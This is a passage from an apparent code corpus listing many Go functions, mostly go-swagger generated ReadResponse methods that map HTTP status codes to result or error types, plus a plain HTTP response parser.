ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 204:\n\t\tresult := NewSaveNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 500:\n\t\tresult := NewSaveInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *TestWriteReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewTestWriteOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewTestWriteUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *AllConnectionsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewAllConnectionsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewAllConnectionsBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewAllConnectionsNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SendDataToDeviceReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewSendDataToDeviceOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewSendDataToDeviceBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewSendDataToDeviceInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *HealthNoopReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewHealthNoopOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *PutOutOfRotationReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 204:\n\t\tresult := NewPutOutOfRotationNoContent()\n\t\tresult.HttpResponse = response\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\terrorResult := kbcommon.NewKillbillError(response.Code())\n\t\tif err := consumer.Consume(response.Body(), &errorResult); err != nil && err != io.EOF {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, errorResult\n\t}\n}", "func (o *GetReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *ReplaceServerReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewReplaceServerOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 202:\n\t\tresult := NewReplaceServerAccepted()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewReplaceServerBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewReplaceServerNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\tresult := NewReplaceServerDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *StatusReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewStatusOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewStatusUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 403:\n\t\tresult := NewStatusForbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func ReadResponse(r *bfe_bufio.Reader, req *Request) (*Response, error) {\n\ttp := textproto.NewReader(r)\n\tresp := &Response{\n\t\tRequest: req,\n\t}\n\n\t// Parse the first line of the response.\n\tline, err := tp.ReadLine()\n\tif err != nil {\n\t\tif err == io.EOF {\n\t\t\terr = io.ErrUnexpectedEOF\n\t\t}\n\t\treturn nil, err\n\t}\n\tf := strings.SplitN(line, \" \", 3)\n\tif len(f) < 2 {\n\t\treturn nil, &badStringError{\"malformed HTTP response\", line}\n\t}\n\treasonPhrase := \"\"\n\tif len(f) > 2 {\n\t\treasonPhrase = f[2]\n\t}\n\tresp.Status = f[1] + \" \" + reasonPhrase\n\tresp.StatusCode, err = strconv.Atoi(f[1])\n\tif err != nil {\n\t\treturn nil, &badStringError{\"malformed HTTP status code\", f[1]}\n\t}\n\n\tresp.Proto = f[0]\n\tvar ok bool\n\tif resp.ProtoMajor, resp.ProtoMinor, ok = ParseHTTPVersion(resp.Proto); !ok {\n\t\treturn nil, &badStringError{\"malformed HTTP version\", resp.Proto}\n\t}\n\n\t// Parse the response headers.\n\tmimeHeader, err := tp.ReadMIMEHeader()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresp.Header = Header(mimeHeader)\n\n\tfixPragmaCacheControl(resp.Header)\n\n\terr = readTransfer(resp, r)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func (o *PostChatroomsChannelHashReadReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewPostChatroomsChannelHashReadOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 403:\n\t\tresult := NewPostChatroomsChannelHashReadForbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *TogglePacketGeneratorsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewTogglePacketGeneratorsCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *FrontPutBinaryReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewFrontPutBinaryOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SystemPingReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewSystemPingOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 500:\n\t\tresult := NewSystemPingInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SendDummyAlertReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewSendDummyAlertOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 400:\n\t\tresult := NewSendDummyAlertBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 404:\n\t\tresult := NewSendDummyAlertNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetViewsConnectionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetViewsConnectionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewGetViewsConnectionBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *SyncCopyReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewSyncCopyOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewSyncCopyDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (c *Conn) readResponse(res *response_) error {\n\terr := c.readDataUnit()\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = IgnoreEOF(scanResponse.Scan(c.decoder, res))\n\tif err != nil {\n\t\treturn err\n\t}\n\tif res.Result.IsError() {\n\t\treturn res.Result\n\t}\n\treturn nil\n}", "func (o *PostPatientsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewPostPatientsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 400:\n\t\tresult := NewPostPatientsBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 405:\n\t\tresult := NewPostPatientsMethodNotAllowed()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *AllConnectionsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n switch response.Code() {\n \n case 200:\n result := NewAllConnectionsOK()\n if err := result.readResponse(response, consumer, o.formats); err != nil {\n return nil, err\n }\n return result, nil\n \n case 400:\n result := NewAllConnectionsBadRequest()\n if err := result.readResponse(response, consumer, o.formats); err != nil {\n return nil, err\n }\n return nil, result\n \n case 404:\n result := NewAllConnectionsNotFound()\n if err := result.readResponse(response, consumer, o.formats); err != nil {\n return nil, err\n }\n return nil, result\n \n default:\n return nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n }\n}", "func (o *GetMsgVpnReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetMsgVpnOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tresult := NewGetMsgVpnDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (r *Response) Read(p []byte) (n int, err error) {\n\n\tif r.Error != nil {\n\t\treturn -1, r.Error\n\t}\n\n\treturn r.RawResponse.Body.Read(p)\n}", "func (o *PostPciLinksMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPostPciLinksMoidCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostPciLinksMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *PostGatewayConnectNetaddressReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 204:\n\t\tresult := NewPostGatewayConnectNetaddressNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostGatewayConnectNetaddressDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *THSRAPIODFare2121Reader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewTHSRAPIODFare2121OK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 299:\n\t\tresult := NewTHSRAPIODFare2121Status299()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 304:\n\t\tresult := NewTHSRAPIODFare2121NotModified()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *DNSGetReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewDNSGetOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewDNSGetDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *GetGreetStatusReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetGreetStatusOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *PostAPIV2EventsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPostAPIV2EventsNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewPostAPIV2EventsBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 403:\n\t\tresult := NewPostAPIV2EventsForbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *CreateAntivirusServerReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewCreateAntivirusServerOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tresult := NewCreateAntivirusServerDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *PostCarsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewPostCarsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 405:\n\t\tresult := NewPostCarsMethodNotAllowed()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *LogReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewLogOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewLogNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *ChatGetConnectedReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewChatGetConnectedOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 400:\n\t\tresult := NewChatGetConnectedBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 401:\n\t\tresult := NewChatGetConnectedUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 404:\n\t\tresult := NewChatGetConnectedNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *WebModifyReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewWebModifyOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 202:\n\t\tresult := NewWebModifyAccepted()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewWebModifyDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *GetHyperflexServerModelsMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetHyperflexServerModelsMoidOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewGetHyperflexServerModelsMoidNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\tresult := NewGetHyperflexServerModelsMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *KillQueryReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 204:\n\t\tresult := NewKillQueryNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewKillQueryBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewKillQueryNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 422:\n\t\tresult := NewKillQueryUnprocessableEntity()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetProgressionViewReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetProgressionViewOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewGetProgressionViewBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *UpdateRackTopoReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUpdateRackTopoOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewUpdateRackTopoBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetByUIDReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetByUIDOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewGetByUIDNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *UtilTestReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUtilTestOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetMeReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetMeOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewGetMeDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *Delete1Reader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 204:\n\t\tresult := NewDelete1NoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewDelete1NotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *PostGatewayDisconnectNetaddressReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 204:\n\t\tresult := NewPostGatewayDisconnectNetaddressNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostGatewayDisconnectNetaddressDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *RevokeReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewRevokeOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewRevokeUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewRevokeNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o 